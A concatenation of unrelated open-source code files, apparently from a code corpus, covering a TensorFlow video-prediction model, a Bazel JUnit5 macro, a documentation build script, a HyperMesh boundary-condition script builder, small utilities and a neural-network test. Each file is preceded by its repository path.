field=models.BooleanField(default=True),
),
]
| 1.632813 | 2 |
src/ctc/protocols/fei_utils/analytics/payload_crud.py | fei-protocol/checkthechain | 94 | 3386 | from __future__ import annotations
import typing
from ctc import spec
from . import timestamp_crud
from . import metric_crud
from . import analytics_spec
async def async_create_payload(
*,
blocks: typing.Sequence[spec.BlockNumberReference] | None = None,
timestamps: typing.Sequence[int] | None = None,
timescale: analytics_spec.TimescaleSpec | None = None,
end_time: analytics_spec.Timestamp | None = None,
window_size: str | None = None,
interval_size: str | None = None,
provider: spec.ProviderSpec = None,
) -> analytics_spec.AnalyticsPayload:
"""create data payload from scratch"""
time_data = await timestamp_crud.async_get_time_data(
blocks=blocks,
timestamps=timestamps,
timescale=timescale,
end_time=end_time,
window_size=window_size,
interval_size=interval_size,
provider=provider,
)
# get data
data = await metric_crud.async_get_metrics(
blocks=time_data['block_numbers']
)
return {
'version': '0.1.0',
#
# time data
'n_samples': time_data['n_samples'],
'window_size': time_data['window_size'],
'interval_size': time_data['interval_size'],
'timestamps': time_data['timestamps'],
'block_numbers': time_data['block_numbers'],
'created_at_timestamp': time_data['created_at_timestamp'],
#
# metric data
'data': data,
}
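# Illustrative usage sketch (assumptions: a default RPC provider is configured
# for ctc, and the block numbers below are placeholders).
if __name__ == '__main__':
    import asyncio

    async def _example() -> None:
        payload = await async_create_payload(blocks=[14_000_000, 14_001_000])
        print(payload['n_samples'], payload['block_numbers'])

    asyncio.run(_example())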
# def update_payload(
# timescale: analytics_spec.Timescale,
# old_payload: analytics_spec.AnalyticsPayload,
# ) -> analytics_spec.AnalyticsPayload:
# new_timestamps = get_new_timestamps(
# timescale=timescale,
# old_payload=old_payload,
# )
# new_blocks = get_new_blocks(
# new_timestamps=new_timestamps,
# old_payload=old_payload,
# )
# new_metrics = get_metrics(blocks=new_blocks)
# return combine_new_data(
# old_payload=old_payload,
# new_metrics=new_metrics,
# )
| 2.234375 | 2 |
research/video_prediction/prediction_model.py | mbz/models | 1 | 3387 | # Copyright 2016 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Model architecture for predictive model, including CDNA, DNA, and STP."""
import numpy as np
import tensorflow as tf
import tensorflow.contrib.slim as slim
from tensorflow.python.platform import flags
from tensorflow.contrib.layers.python import layers as tf_layers
from lstm_ops import basic_conv_lstm_cell
FLAGS = flags.FLAGS
# Amount to use when lower bounding tensors
RELU_SHIFT = 1e-12
# kernel size for DNA and CDNA.
DNA_KERN_SIZE = 5
def kl_divergence(mu, log_sigma):
"""KL divergence of diagonal gaussian N(mu,exp(log_sigma)) and N(0,1).
Args:
mu: mu parameter of the distribution.
log_sigma: log(sigma) parameter of the distribution.
Returns:
the KL loss.
"""
return -.5 * tf.reduce_sum(1. + log_sigma - tf.square(mu) - tf.exp(log_sigma),
axis=1)
def construct_latent_tower(images):
"""Builds convolutional latent tower for stochastic model.
At training time this tower generates a latent distribution (mean and std)
conditioned on the entire video. This latent variable will be fed to the
main tower as an extra variable to be used for future frames prediction.
At inference time, the tower is disabled and only returns latents sampled
from N(0,1).
If the multi_latent flag is on, a different latent for every timestep would
be generated.
Args:
images: tensor of ground truth image sequences
Returns:
latent_mean: predicted latent mean
latent_std: predicted latent standard deviation
    latent_loss: loss of the latent tower
    samples: random samples drawn from a standard gaussian
"""
with slim.arg_scope([slim.conv2d], reuse=False):
stacked_images = tf.concat(images, 3)
latent_enc1 = slim.conv2d(
stacked_images,
32, [3, 3],
stride=2,
scope='latent_conv1',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_norm1'})
latent_enc2 = slim.conv2d(
latent_enc1,
64, [3, 3],
stride=2,
scope='latent_conv2',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_norm2'})
latent_enc3 = slim.conv2d(
latent_enc2,
64, [3, 3],
stride=1,
scope='latent_conv3',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_norm3'})
latent_mean = slim.conv2d(
latent_enc3,
FLAGS.latent_channels, [3, 3],
stride=2,
activation_fn=None,
scope='latent_mean',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_norm_mean'})
latent_std = slim.conv2d(
latent_enc3,
FLAGS.latent_channels, [3, 3],
stride=2,
scope='latent_std',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_std_norm'})
latent_std += FLAGS.latent_std_min
divergence = kl_divergence(latent_mean, latent_std)
latent_loss = tf.reduce_mean(divergence)
if FLAGS.multi_latent:
# timestep x batch_size x latent_size
samples = tf.random_normal(
[FLAGS.sequence_length-1] + latent_mean.shape, 0, 1,
dtype=tf.float32)
else:
# batch_size x latent_size
samples = tf.random_normal(latent_mean.shape, 0, 1, dtype=tf.float32)
if FLAGS.inference_time:
# No latent tower at inference time, just standard gaussian.
return None, None, None, samples
else:
return latent_mean, latent_std, latent_loss, samples
def construct_model(images,
actions=None,
states=None,
iter_num=-1.0,
k=-1,
use_state=True,
num_masks=10,
stp=False,
cdna=True,
dna=False,
context_frames=2):
"""Build convolutional lstm video predictor using STP, CDNA, or DNA.
Args:
images: tensor of ground truth image sequences
actions: tensor of action sequences
states: tensor of ground truth state sequences
iter_num: tensor of the current training iteration (for sched. sampling)
k: constant used for scheduled sampling. -1 to feed in own prediction.
use_state: True to include state and action in prediction
num_masks: the number of different pixel motion predictions (and
the number of masks for each of those predictions)
stp: True to use Spatial Transformer Predictor (STP)
    cdna: True to use Convolutional Dynamic Neural Advection (CDNA)
dna: True to use Dynamic Neural Advection (DNA)
context_frames: number of ground truth frames to pass in before
feeding in own predictions
Returns:
gen_images: predicted future image frames
gen_states: predicted future states
Raises:
ValueError: if more than one network option specified or more than 1 mask
specified for DNA model.
"""
# Each image is being used twice, in latent tower and main tower.
# This is to make sure we are using the *same* image for both, ...
# ... given how TF queues work.
images = [tf.identity(image) for image in images]
if stp + cdna + dna != 1:
raise ValueError('More than one, or no network option specified.')
batch_size, img_height, img_width, color_channels = images[0].get_shape()[0:4]
lstm_func = basic_conv_lstm_cell
# Generated robot states and images.
gen_states, gen_images = [], []
current_state = states[0]
if k == -1:
feedself = True
else:
# Scheduled sampling:
# Calculate number of ground-truth frames to pass in.
num_ground_truth = tf.to_int32(
tf.round(tf.to_float(batch_size) * (k / (k + tf.exp(iter_num / k)))))
feedself = False
# LSTM state sizes and states.
lstm_size = np.int32(np.array([32, 32, 64, 64, 128, 64, 32]))
lstm_state1, lstm_state2, lstm_state3, lstm_state4 = None, None, None, None
lstm_state5, lstm_state6, lstm_state7 = None, None, None
# Latent tower
latent_loss = 0.0
if FLAGS.stochastic_model:
latent_tower_outputs = construct_latent_tower(images)
latent_mean, latent_std, latent_loss, samples = latent_tower_outputs
# Main tower
for image, action in zip(images[:-1], actions[:-1]):
# Reuse variables after the first timestep.
reuse = bool(gen_images)
done_warm_start = len(gen_images) > context_frames - 1
with slim.arg_scope(
[lstm_func, slim.layers.conv2d, slim.layers.fully_connected,
tf_layers.layer_norm, slim.layers.conv2d_transpose],
reuse=reuse):
if feedself and done_warm_start:
# Feed in generated image.
prev_image = gen_images[-1]
elif done_warm_start:
# Scheduled sampling
prev_image = scheduled_sample(image, gen_images[-1], batch_size,
num_ground_truth)
else:
# Always feed in ground_truth
prev_image = image
# Predicted state is always fed back in
state_action = tf.concat(axis=1, values=[action, current_state])
enc0 = slim.layers.conv2d(
prev_image,
32, [5, 5],
stride=2,
scope='scale1_conv1',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'layer_norm1'})
hidden1, lstm_state1 = lstm_func(
enc0, lstm_state1, lstm_size[0], scope='state1')
hidden1 = tf_layers.layer_norm(hidden1, scope='layer_norm2')
hidden2, lstm_state2 = lstm_func(
hidden1, lstm_state2, lstm_size[1], scope='state2')
hidden2 = tf_layers.layer_norm(hidden2, scope='layer_norm3')
enc1 = slim.layers.conv2d(
hidden2, hidden2.get_shape()[3], [3, 3], stride=2, scope='conv2')
hidden3, lstm_state3 = lstm_func(
enc1, lstm_state3, lstm_size[2], scope='state3')
hidden3 = tf_layers.layer_norm(hidden3, scope='layer_norm4')
hidden4, lstm_state4 = lstm_func(
hidden3, lstm_state4, lstm_size[3], scope='state4')
hidden4 = tf_layers.layer_norm(hidden4, scope='layer_norm5')
enc2 = slim.layers.conv2d(
hidden4, hidden4.get_shape()[3], [3, 3], stride=2, scope='conv3')
# Pass in state and action.
smear = tf.reshape(
state_action,
[int(batch_size), 1, 1, int(state_action.get_shape()[1])])
smear = tf.tile(
smear, [1, int(enc2.get_shape()[1]), int(enc2.get_shape()[2]), 1])
if use_state:
enc2 = tf.concat(axis=3, values=[enc2, smear])
# Setup latent
if FLAGS.stochastic_model:
latent = samples
if FLAGS.multi_latent:
          latent = samples[len(gen_images)]  # index of the current timestep
if not FLAGS.inference_time:
latent = tf.cond(iter_num < FLAGS.num_iterations_1st_stage,
lambda: tf.identity(latent),
lambda: latent_mean + tf.exp(latent_std / 2.0) * latent)
with tf.control_dependencies([latent]):
enc2 = tf.concat([enc2, latent], 3)
enc3 = slim.layers.conv2d(
enc2, hidden4.get_shape()[3], [1, 1], stride=1, scope='conv4')
hidden5, lstm_state5 = lstm_func(
enc3, lstm_state5, lstm_size[4], scope='state5') # last 8x8
hidden5 = tf_layers.layer_norm(hidden5, scope='layer_norm6')
enc4 = slim.layers.conv2d_transpose(
hidden5, hidden5.get_shape()[3], 3, stride=2, scope='convt1')
hidden6, lstm_state6 = lstm_func(
enc4, lstm_state6, lstm_size[5], scope='state6') # 16x16
hidden6 = tf_layers.layer_norm(hidden6, scope='layer_norm7')
# Skip connection.
hidden6 = tf.concat(axis=3, values=[hidden6, enc1]) # both 16x16
enc5 = slim.layers.conv2d_transpose(
hidden6, hidden6.get_shape()[3], 3, stride=2, scope='convt2')
hidden7, lstm_state7 = lstm_func(
enc5, lstm_state7, lstm_size[6], scope='state7') # 32x32
hidden7 = tf_layers.layer_norm(hidden7, scope='layer_norm8')
# Skip connection.
hidden7 = tf.concat(axis=3, values=[hidden7, enc0]) # both 32x32
enc6 = slim.layers.conv2d_transpose(
hidden7,
hidden7.get_shape()[3], 3, stride=2, scope='convt3', activation_fn=None,
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'layer_norm9'})
if dna:
# Using largest hidden state for predicting untied conv kernels.
enc7 = slim.layers.conv2d_transpose(
enc6, DNA_KERN_SIZE**2, 1, stride=1, scope='convt4', activation_fn=None)
else:
# Using largest hidden state for predicting a new image layer.
enc7 = slim.layers.conv2d_transpose(
enc6, color_channels, 1, stride=1, scope='convt4', activation_fn=None)
# This allows the network to also generate one image from scratch,
# which is useful when regions of the image become unoccluded.
transformed = [tf.nn.sigmoid(enc7)]
if stp:
stp_input0 = tf.reshape(hidden5, [int(batch_size), -1])
stp_input1 = slim.layers.fully_connected(
stp_input0, 100, scope='fc_stp')
transformed += stp_transformation(prev_image, stp_input1, num_masks)
elif cdna:
cdna_input = tf.reshape(hidden5, [int(batch_size), -1])
transformed += cdna_transformation(prev_image, cdna_input, num_masks,
int(color_channels))
elif dna:
# Only one mask is supported (more should be unnecessary).
if num_masks != 1:
raise ValueError('Only one mask is supported for DNA model.')
transformed = [dna_transformation(prev_image, enc7)]
masks = slim.layers.conv2d_transpose(
enc6, num_masks + 1, 1, stride=1, scope='convt7', activation_fn=None)
masks = tf.reshape(
tf.nn.softmax(tf.reshape(masks, [-1, num_masks + 1])),
[int(batch_size), int(img_height), int(img_width), num_masks + 1])
mask_list = tf.split(axis=3, num_or_size_splits=num_masks + 1, value=masks)
output = mask_list[0] * prev_image
for layer, mask in zip(transformed, mask_list[1:]):
output += layer * mask
gen_images.append(output)
current_state = slim.layers.fully_connected(
state_action,
int(current_state.get_shape()[1]),
scope='state_pred',
activation_fn=None)
gen_states.append(current_state)
return gen_images, gen_states, latent_loss
## Utility functions
def stp_transformation(prev_image, stp_input, num_masks):
"""Apply spatial transformer predictor (STP) to previous image.
Args:
prev_image: previous image to be transformed.
stp_input: hidden layer to be used for computing STN parameters.
num_masks: number of masks and hence the number of STP transformations.
Returns:
List of images transformed by the predicted STP parameters.
"""
# Only import spatial transformer if needed.
from spatial_transformer import transformer
identity_params = tf.convert_to_tensor(
np.array([1.0, 0.0, 0.0, 0.0, 1.0, 0.0], np.float32))
transformed = []
for i in range(num_masks - 1):
params = slim.layers.fully_connected(
stp_input, 6, scope='stp_params' + str(i),
activation_fn=None) + identity_params
transformed.append(transformer(prev_image, params))
return transformed
def cdna_transformation(prev_image, cdna_input, num_masks, color_channels):
"""Apply convolutional dynamic neural advection to previous image.
Args:
prev_image: previous image to be transformed.
    cdna_input: hidden layer to be used for computing CDNA kernels.
num_masks: the number of masks and hence the number of CDNA transformations.
color_channels: the number of color channels in the images.
Returns:
List of images transformed by the predicted CDNA kernels.
"""
batch_size = int(cdna_input.get_shape()[0])
height = int(prev_image.get_shape()[1])
width = int(prev_image.get_shape()[2])
# Predict kernels using linear function of last hidden layer.
cdna_kerns = slim.layers.fully_connected(
cdna_input,
DNA_KERN_SIZE * DNA_KERN_SIZE * num_masks,
scope='cdna_params',
activation_fn=None)
# Reshape and normalize.
cdna_kerns = tf.reshape(
cdna_kerns, [batch_size, DNA_KERN_SIZE, DNA_KERN_SIZE, 1, num_masks])
cdna_kerns = tf.nn.relu(cdna_kerns - RELU_SHIFT) + RELU_SHIFT
norm_factor = tf.reduce_sum(cdna_kerns, [1, 2, 3], keep_dims=True)
cdna_kerns /= norm_factor
# Treat the color channel dimension as the batch dimension since the same
# transformation is applied to each color channel.
# Treat the batch dimension as the channel dimension so that
# depthwise_conv2d can apply a different transformation to each sample.
cdna_kerns = tf.transpose(cdna_kerns, [1, 2, 0, 4, 3])
cdna_kerns = tf.reshape(cdna_kerns, [DNA_KERN_SIZE, DNA_KERN_SIZE, batch_size, num_masks])
# Swap the batch and channel dimensions.
prev_image = tf.transpose(prev_image, [3, 1, 2, 0])
# Transform image.
transformed = tf.nn.depthwise_conv2d(prev_image, cdna_kerns, [1, 1, 1, 1], 'SAME')
# Transpose the dimensions to where they belong.
transformed = tf.reshape(transformed, [color_channels, height, width, batch_size, num_masks])
transformed = tf.transpose(transformed, [3, 1, 2, 0, 4])
transformed = tf.unstack(transformed, axis=-1)
return transformed
def dna_transformation(prev_image, dna_input):
"""Apply dynamic neural advection to previous image.
Args:
prev_image: previous image to be transformed.
    dna_input: hidden layer to be used for computing DNA transformation.
Returns:
    Image transformed by the predicted DNA kernel.
"""
# Construct translated images.
prev_image_pad = tf.pad(prev_image, [[0, 0], [2, 2], [2, 2], [0, 0]])
image_height = int(prev_image.get_shape()[1])
image_width = int(prev_image.get_shape()[2])
inputs = []
for xkern in range(DNA_KERN_SIZE):
for ykern in range(DNA_KERN_SIZE):
inputs.append(
tf.expand_dims(
tf.slice(prev_image_pad, [0, xkern, ykern, 0],
[-1, image_height, image_width, -1]), [3]))
inputs = tf.concat(axis=3, values=inputs)
# Normalize channels to 1.
kernel = tf.nn.relu(dna_input - RELU_SHIFT) + RELU_SHIFT
kernel = tf.expand_dims(
kernel / tf.reduce_sum(
kernel, [3], keep_dims=True), [4])
return tf.reduce_sum(kernel * inputs, [3], keep_dims=False)
def scheduled_sample(ground_truth_x, generated_x, batch_size, num_ground_truth):
"""Sample batch with specified mix of ground truth and generated data points.
Args:
ground_truth_x: tensor of ground-truth data points.
generated_x: tensor of generated data points.
batch_size: batch size
num_ground_truth: number of ground-truth examples to include in batch.
Returns:
New batch with num_ground_truth sampled from ground_truth_x and the rest
from generated_x.
"""
idx = tf.random_shuffle(tf.range(int(batch_size)))
ground_truth_idx = tf.gather(idx, tf.range(num_ground_truth))
generated_idx = tf.gather(idx, tf.range(num_ground_truth, int(batch_size)))
ground_truth_examps = tf.gather(ground_truth_x, ground_truth_idx)
generated_examps = tf.gather(generated_x, generated_idx)
return tf.dynamic_stitch([ground_truth_idx, generated_idx],
[ground_truth_examps, generated_examps])
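# Illustrative sketch (assumption: TF1-style graph execution, matching the rest
# of this file). Each output row is taken from the ground-truth batch or the
# generated batch according to a random 3-vs-1 split.
if __name__ == '__main__':
  gt_batch = tf.constant([[0.0], [1.0], [2.0], [3.0]])
  gen_batch = tf.constant([[10.0], [11.0], [12.0], [13.0]])
  mixed = scheduled_sample(gt_batch, gen_batch, batch_size=4, num_ground_truth=3)
  with tf.Session() as sess:
    print(sess.run(mixed))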
| 2.078125 | 2 |
junit5/rules.bzl | prashantsharma04/bazel_java_rules | 1 | 3388 | <filename>junit5/rules.bzl
load("@rules_jvm_external//:defs.bzl", "artifact")
# For more information see
# - https://github.com/bmuschko/bazel-examples/blob/master/java/junit5-test/BUILD
# - https://github.com/salesforce/bazel-maven-proxy/tree/master/tools/junit5
# - https://github.com/junit-team/junit5-samples/tree/master/junit5-jupiter-starter-bazel
def junit5_test(name, srcs, test_package, resources = [], deps = [], runtime_deps = [], **kwargs):
"""JUnit runner macro"""
FILTER_KWARGS = [
"main_class",
"use_testrunner",
"args",
]
for arg in FILTER_KWARGS:
if arg in kwargs.keys():
kwargs.pop(arg)
junit_console_args = []
if test_package:
junit_console_args += ["--select-package", test_package]
else:
fail("must specify 'test_package'")
native.java_test(
name = name,
srcs = srcs,
use_testrunner = False,
main_class = "org.junit.platform.console.ConsoleLauncher",
args = junit_console_args,
deps = deps + [
artifact("org.junit.jupiter:junit-jupiter-api"),
artifact("org.junit.jupiter:junit-jupiter-params"),
artifact("org.junit.jupiter:junit-jupiter-engine"),
artifact("org.hamcrest:hamcrest-library"),
artifact("org.hamcrest:hamcrest-core"),
artifact("org.hamcrest:hamcrest"),
artifact("org.mockito:mockito-core"),
],
visibility = ["//java:__subpackages__"],
resources = resources,
runtime_deps = runtime_deps + [
artifact("org.junit.platform:junit-platform-console"),
],
**kwargs
)
| 1.898438 | 2 |
tests/mocked_carla.py | fangedward/pylot | 0 | 3389 | # This module provides mocked versions of classes and functions provided
# by Carla in our runtime environment.
class Location(object):
""" A mock class for carla.Location. """
def __init__(self, x, y, z):
self.x = x
self.y = y
self.z = z
class Rotation(object):
""" A mock class for carla.Rotation. """
def __init__(self, pitch, yaw, roll):
self.pitch = pitch
self.yaw = yaw
self.roll = roll
class Vector3D(object):
""" A mock class for carla.Vector3D. """
def __init__(self, x, y, z):
self.x = x
self.y = y
self.z = z
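# Illustrative usage (not part of the original module): the mocks mirror the
# small slice of the carla API that the tests exercise.
if __name__ == "__main__":
    loc = Location(x=1.0, y=2.0, z=0.5)
    rot = Rotation(pitch=0.0, yaw=90.0, roll=0.0)
    vec = Vector3D(x=0.0, y=1.0, z=0.0)
    print(loc.x, rot.yaw, vec.y)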
| 3.109375 | 3 |
rgb_to_cmyk.py | Zweizack/fuzzy-rainbow | 0 | 3390 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
ee = '\033[1m'
green = '\033[32m'
yellow = '\033[33m'
cyan = '\033[36m'
line = cyan+'-' * 0x2D
print(ee+line)
R,G,B = [float(X) / 0xFF for X in input(f'{yellow}RGB: {green}').split()]
K = 1-max(R,G,B)
if K < 1:
    C,M,Y = [round(float((1-X-K)/(1-K) * 0x64),1) for X in [R,G,B]]
else:
    C = M = Y = 0.0  # pure black: avoid division by zero when K == 1
K = round(K * 0x64,1)
print(f'{yellow}CMYK: {green}{C}%, {M}%, {Y}%, {K}%')
print(line)
| 2.9375 | 3 |
docs/updatedoc.py | JukeboxPipeline/jukedj | 2 | 3391 | <gh_stars>1-10
#!/usr/bin/env python
"""Builds the documentaion. First it runs gendoc to create rst files for the source code. Then it runs sphinx make.
.. Warning:: This will delete the content of the output directory first! So you might loose data.
You can use updatedoc.py -nod.
Usage, just call::
updatedoc.py -h
"""
import argparse
import os
import shutil
import sys
import gendoc
thisdir = os.path.abspath(os.path.dirname(__file__))
def setup_argparse():
"""Sets up the argument parser and returns it
:returns: the parser
:rtype: :class:`argparse.ArgumentParser`
:raises: None
"""
parser = argparse.ArgumentParser(
description="Builds the documentaion. First it runs gendoc to create rst files\
for the source code. Then it runs sphinx make.\
WARNING: this will delete the contents of the output dirs. You can use -nod.")
ipath = os.path.join(thisdir, '../src')
ipath = os.path.abspath(ipath)
idefault = [ipath]
parser.add_argument('-i', '--input', nargs='+', default=idefault,
help='list of input directories. gendoc is called for every\
source dir.\
Default is \'%s\'.' % ', '.join(idefault))
opath = os.path.join(thisdir, 'reference')
opath = os.path.abspath(opath)
odefault = [opath]
parser.add_argument('-o', '--output', nargs='+', default=odefault,
help='list of output directories. if you have multiple source\
                        directories, the corresponding output directory is used.\
if there are less dirs than for source, the last output dir\
is used for the remaining source dirs.\
WARNING: the output directories are emptied by default. See -nod.\
Default is \'%s\'.' % ', '.join(odefault))
gadefault = ['-T', '-f', '-e', '-o']
parser.add_argument('-ga', '--gendocargs', nargs='*', default=gadefault,
help="list of arguments to pass to gendoc. use -gh for info.\
Default is \'%s\'" % ', '.join(gadefault))
parser.add_argument('-nod', '--nodelete', action='store_true',
help='Do not empty the output directories first.')
parser.add_argument('-gh', '--gendochelp', action='store_true',
help='print the help for gendoc and exit')
return parser
def prepare_dir(directory, delete=True):
"""Create apidoc dir, delete contents if delete is True.
:param directory: the apidoc directory. you can use relative paths here
:type directory: str
:param delete: if True, deletes the contents of apidoc. This acts like an override switch.
:type delete: bool
:returns: None
:rtype: None
:raises: None
"""
if os.path.exists(directory):
if delete:
assert directory != thisdir, 'Trying to delete docs! Specify other output dir!'
print 'Deleting %s' % directory
shutil.rmtree(directory)
print 'Creating %s' % directory
os.mkdir(directory)
else:
print 'Creating %s' % directory
os.mkdir(directory)
def run_gendoc(source, dest, args):
"""Starts gendoc which reads source and creates rst files in dest with the given args.
:param source: The python source directory for gendoc. Can be a relative path.
:type source: str
:param dest: The destination for the rst files. Can be a relative path.
:type dest: str
:param args: Arguments for gendoc. See gendoc for more information.
:type args: list
:returns: None
:rtype: None
:raises: SystemExit
"""
args.insert(0, 'gendoc.py')
args.append(dest)
args.append(source)
print 'Running gendoc.main with: %s' % args
gendoc.main(args)
def main(argv=sys.argv[1:]):
"""Parse commandline arguments and run the tool
:param argv: the commandline arguments.
:type argv: list
:returns: None
:rtype: None
:raises: None
"""
parser = setup_argparse()
args = parser.parse_args(argv)
if args.gendochelp:
sys.argv[0] = 'gendoc.py'
genparser = gendoc.setup_parser()
genparser.print_help()
sys.exit(0)
print 'Preparing output directories'
print '='*80
for odir in args.output:
prepare_dir(odir, not args.nodelete)
print '\nRunning gendoc'
print '='*80
for i, idir in enumerate(args.input):
if i >= len(args.output):
odir = args.output[-1]
else:
odir = args.output[i]
run_gendoc(idir, odir, args.gendocargs)
if __name__ == '__main__':
main() | 2.3125 | 2 |
sort/selectionsort.py | vitormrts/sorting-algorithms | 0 | 3392 | def selection_sort(A): # O(n^2)
n = len(A)
    for i in range(n-1): # traverse the list
min = i
        for j in range(i+1, n): # find the smallest element of the list starting at i + 1
if A[j] < A[min]:
min = j
        A[i], A[min] = A[min], A[i] # put the element in its correct position
return A
# 1 + (n-1)*[3 + X] = 1 + 3*(n-1) + X*(n-1) = 1 + 3*(n-1) + (n^2 + n - 2)/2
# = (1 - 3 - 1) + (3n + n/2) + (n^2/2)
# The complexity is O(n^2) | 3.796875 | 4 |
BridgeOptimizer/scriptBuilder/ScriptBuilderBoundaryConditions.py | manuel1618/bridgeOptimizer | 1 | 3393 | import os
from typing import List, Tuple
from BridgeOptimizer.datastructure.hypermesh.LoadCollector import LoadCollector
from BridgeOptimizer.datastructure.hypermesh.LoadStep import LoadStep
from BridgeOptimizer.datastructure.hypermesh.Force import Force
from BridgeOptimizer.datastructure.hypermesh.SPC import SPC
class ScriptBuilderBoundaryConditions:
"""
Extra class for generating Loadstep, Loadcollectors, Forces and Constraints
Parameters:
---------
None
"""
def __init__(self) -> None:
pass
def write_tcl_commands_loadCollectors(self, tcl_commands: List) -> None:
"""
Creates all the load collectors (has to be done before creating loadsteps, as the loadcollectors are referenced)
"""
load_collector: LoadCollector = None
# create all load collectors and loads first
for load_collector in LoadCollector.instances:
load_collector_type = load_collector.get_load_collector_type()
load_collector.name = f"{str(load_collector_type.__name__)}_{str(load_collector.get_id())}"
tcl_commands.append(
f"*createentity loadcols includeid=0 name=\"{load_collector.name}\"")
# create loads
for load in load_collector.loads:
if load_collector_type == Force:
force: Force = load
tcl_commands.append(
f"*createmark nodes 1 {' '.join([str(x) for x in force.nodeIds])}")
tcl_commands.append(
f"*loadcreateonentity_curve nodes 1 1 1 {force.x} {force.y} {force.z} 0 {force.x} {force.y} {force.z} 0 0 0 0")
elif load_collector_type == SPC:
spc: SPC = load
tcl_commands.append(
f"*createmark nodes 1 {' '.join([str(x) for x in spc.nodeIds])}")
tcl_commands.append(
f"*loadcreateonentity_curve nodes 1 3 1 {spc.dofs[0]} {spc.dofs[1]} {spc.dofs[2]} {spc.dofs[3]} {spc.dofs[4]} {spc.dofs[5]} 0 0 0 0 0")
tcl_commands.append("*createmark loads 0 1")
tcl_commands.append("*loadsupdatefixedvalue 0 0")
def write_tcl_commands_loadsteps(self, tcl_commands: List) -> None:
"""
Single method to write all tcl commands to the file
"""
self.write_tcl_commands_loadCollectors(tcl_commands)
# create the load step
load_step: LoadStep = None
for load_step in LoadStep.instances:
load_step_id = str(load_step.get_id())
# TODO: should be possible to just use a spc collector - not possible rn.
spc_loadCollector = load_step.spc_loadCollector
load_loadCollector = load_step.load_loadCollector
spc_loadCollector_id = str(spc_loadCollector.get_id())
load_loadCollector_id = str(load_loadCollector.get_id())
tcl_commands.append(
f"*createmark loadcols 1 \"{spc_loadCollector.name}\" \"{load_loadCollector.name}\"")
tcl_commands.append("*createmark outputblocks 1")
tcl_commands.append("*createmark groups 1")
tcl_commands.append(
f"*loadstepscreate \"loadstep_{load_step_id}\" 1")
tcl_commands.append(
f"*attributeupdateint loadsteps {load_step_id} 4143 1 1 0 1")
tcl_commands.append(
f"*attributeupdateint loadsteps {load_step_id} 4709 1 1 0 1")
tcl_commands.append(
f"*setvalue loadsteps id={load_step_id} STATUS=2 4059=1 4060=STATICS")
tcl_commands.append(
f"*attributeupdateentity loadsteps {load_step_id} 4145 1 1 0 loadcols {spc_loadCollector_id}")
tcl_commands.append(
f"*attributeupdateentity loadsteps {load_step_id} 4147 1 1 0 loadcols {load_loadCollector_id}")
tcl_commands.append(
f"*attributeupdateint loadsteps {load_step_id} 3800 1 1 0 0")
tcl_commands.append(
f"*attributeupdateint loadsteps {load_step_id} 707 1 1 0 0")
tcl_commands.append(
f"*attributeupdateint loadsteps {load_step_id} 2396 1 1 0 0")
tcl_commands.append(
f"*attributeupdateint loadsteps {load_step_id} 8134 1 1 0 0")
tcl_commands.append(
f"*attributeupdateint loadsteps {load_step_id} 2160 1 1 0 0")
tcl_commands.append(
f"*attributeupdateint loadsteps {load_step_id} 10212 1 1 0 0")
| 2.078125 | 2 |
Lekcija08/script01.py | islamspahic/python-uup | 0 | 3394 | tajniBroj = 51
broj = 2
while tajniBroj != broj:
broj = int(input("Pogodite tajni broj: "))
if tajniBroj == broj:
print("Pogodak!")
elif tajniBroj < broj:
print("Tajni broj je manji od tog broja.")
else:
print("Tajni broj je veci od tog broja.")
print("Kraj programa")
| 3.6875 | 4 |
tests/algorithms/memory/test_cmac.py | FrostByte266/neupy | 801 | 3395 | <gh_stars>100-1000
import numpy as np
from sklearn import metrics
from neupy import algorithms
from base import BaseTestCase
class CMACTestCase(BaseTestCase):
def test_cmac(self):
X_train = np.reshape(np.linspace(0, 2 * np.pi, 100), (100, 1))
X_train_before = X_train.copy()
X_test = np.reshape(np.linspace(np.pi, 2 * np.pi, 50), (50, 1))
y_train = np.sin(X_train)
y_train_before = y_train.copy()
y_test = np.sin(X_test)
cmac = algorithms.CMAC(
quantization=100,
associative_unit_size=32,
step=0.2,
verbose=False,
)
cmac.train(X_train, y_train, epochs=100)
predicted_test = cmac.predict(X_test)
predicted_test = predicted_test.reshape((len(predicted_test), 1))
error = metrics.mean_absolute_error(y_test, predicted_test)
self.assertAlmostEqual(error, 0.0024, places=4)
# Test that algorithm didn't modify data samples
np.testing.assert_array_equal(X_train, X_train_before)
np.testing.assert_array_equal(X_train, X_train_before)
np.testing.assert_array_equal(y_train, y_train_before)
self.assertPickledNetwork(cmac, X_train)
def test_train_different_inputs(self):
self.assertInvalidVectorTrain(
network=algorithms.CMAC(),
input_vector=np.array([1, 2, 3]),
target=np.array([1, 2, 3])
)
def test_predict_different_inputs(self):
cmac = algorithms.CMAC()
data = np.array([[1, 2, 3]]).T
target = np.array([[1, 2, 3]]).T
cmac.train(data, target, epochs=100)
self.assertInvalidVectorPred(
network=cmac,
input_vector=np.array([1, 2, 3]),
target=target,
decimal=2
)
def test_cmac_multi_output(self):
X_train = np.linspace(0, 2 * np.pi, 100)
X_train = np.vstack([X_train, X_train])
X_test = np.linspace(0, 2 * np.pi, 100)
X_test = np.vstack([X_test, X_test])
y_train = np.sin(X_train)
y_test = np.sin(X_test)
cmac = algorithms.CMAC(
quantization=100,
associative_unit_size=32,
step=0.2,
)
cmac.train(X_train, y_train,
X_test, y_test, epochs=100)
predicted_test = cmac.predict(X_test)
error = metrics.mean_absolute_error(y_test, predicted_test)
self.assertAlmostEqual(error, 0, places=6)
def test_cmac_training_exceptions(self):
cmac = algorithms.CMAC(
quantization=100,
associative_unit_size=32,
step=0.2,
)
